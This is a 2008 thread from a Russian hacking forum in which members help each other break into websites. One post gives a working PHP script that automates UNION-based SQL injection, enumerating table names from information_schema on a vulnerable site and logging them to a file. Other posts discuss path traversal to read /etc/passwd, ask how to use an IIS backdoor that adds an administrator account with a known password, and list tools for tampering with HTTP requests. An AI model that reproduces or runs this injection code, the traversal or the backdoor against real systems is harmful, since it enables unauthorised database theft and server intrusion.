03.06.2008, 09:02
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
2 Sabe
Ну если версия 5 ( если майскуль ) то можно вручную извлечь из всех таблиц всю инфу с БД, также есть много скриптов на пхп и перл для автоматизации этого процесса. В ином случае никак бд не слить
|
|
|
03.06.2008, 16:37
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
0nep@t0p
припустим что 5. можно пример запроса? или скрипт для автоматизации 
|
|
|
|
03.06.2008, 17:03
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
PHP код:
<?php
set_time_limit(0);
ignore_user_abort(true);
$s=1;
$f=39913;
$fph = fopen ("result.txt", 'a+');
for ($i=$s; $i<=$f; $i++) {
$aps = file_get_contents("[твой сайт и путь до уязвимого скрипта]=-1+union+select+concat(0x3a3a3a,table_name,0x3a3a3a )+from+information_schema.tables+limit+".$i.",1/*");
$res=null;
$pattern ="/:::(.+):::/";
preg_match_all($pattern, $aps, $out);
$res=array_values(array_unique($out[0]));
fputs ($fph, $res[0]."\r\n");
sleep (5);
}
fclose ($fph);
?>
Незабудь подправить запрос соответсвенно нуждам
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
03.06.2008, 21:06
|
|
Познающий
Регистрация: 27.08.2007
Сообщений: 48
С нами:
9845611
Репутация:
17
|
|
а шо значит ошибка 406?пыталась попасть в etc путь вида p=../etc/домен/&f=passwd ,ниче страшного если так и оставить,или лучше и это фильтровать?
|
|
|
|
03.06.2008, 21:09
|
|
Познающий
Регистрация: 27.08.2007
Сообщений: 48
С нами:
9845611
Репутация:
17
|
|
ошибку эту знаю,всмысле оно ж все равно не даст файл открыть,или можна попытатьса?
|
|
|
|
03.06.2008, 22:31
|
|
Новичок
Регистрация: 02.06.2008
Сообщений: 3
С нами:
9443042
Репутация:
0
|
|
нашел там в C:\Inetpub\wwwroot\da***\idq.dll, в которой прописан
There will add a Administrators User "iisuser",Its Password is "ab007".If you want to enter cmd.exe shell,please use ispc.exe.
как его запустить?
|
|
|
|
09.06.2008, 12:21
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Какой программой можно формировать и посылать на нужный сайт tcp/ip запросы, просматривать пакеты и пр.?
|
|
|
|
09.06.2008, 12:35
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
Я не совсем понял тебя про TCP/IP запросы... хм, это что?
Если же ты имел виду посылку запросов по HTTP протоколу (POST, GET...) то можно использовать аддоны к файрфоксу.
UrlParams - позволяет редактировать как гет так и пост. (https://addons.mozilla.org/ru/firefox/addon/1290)
LiveHTTPheaders - показывает запросы и позволяет их отправить повторно, можно при этом их подредактировать. (http://livehttpheaders.mozdev.org/)
Tamper Data - позволяет перехватывать запрос и изменять. (http://tamperdata.mozdev.org/help.html)
Последний раз редактировалось Red_Red1; 09.06.2008 в 12:36..
Причина: Добавил урлы
|
|
|
|
09.06.2008, 12:36
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Это я и имел ввиду Спасибо |
|
|
|
09.06.2008, 12:50
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Ershik, есть ещё NAVUNS + INETCRACK старая но удобная связка |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
